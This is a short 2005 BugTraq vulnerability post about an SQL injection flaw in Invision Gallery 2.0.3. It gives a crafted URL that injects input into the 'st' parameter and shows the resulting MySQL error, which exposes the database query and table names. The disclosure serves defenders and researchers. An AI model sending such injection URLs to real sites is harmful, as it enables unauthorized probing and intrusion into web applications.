BugTraq
SQL In Invision Gallery 2.0.3 Oct 30 2005 03:15PM
almaster hotmail com
Credit: By aLMaSTeR HaCKeR [ almaster (at) hotmail (dot) com [email concealed]]

Vulnerable: Invision Gallery 2.0.3

EXPLIOT:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=
date&order_key=DESC&prune_key=30&st=|aLMaSTeR

The Error:

mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated
FROM ibf_gallery_images i
LEFT JOIN ibf_members m ON ( m.id=i.member_id )
LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )
WHERE category_id=26 AND i.approved=1
GROUP BY i.id
ORDER BY pinned DESC, date DESC , i.id DESC LIMIT ', 20

SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 7
SQL error code:
Date: Sunday 30th of October 2005 04:53:19 PM

Thanks TO MY FRIENDS IN S4A.CC

almaster (at) s4a (dot) cc [email concealed] or almaster (at) hotmail (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus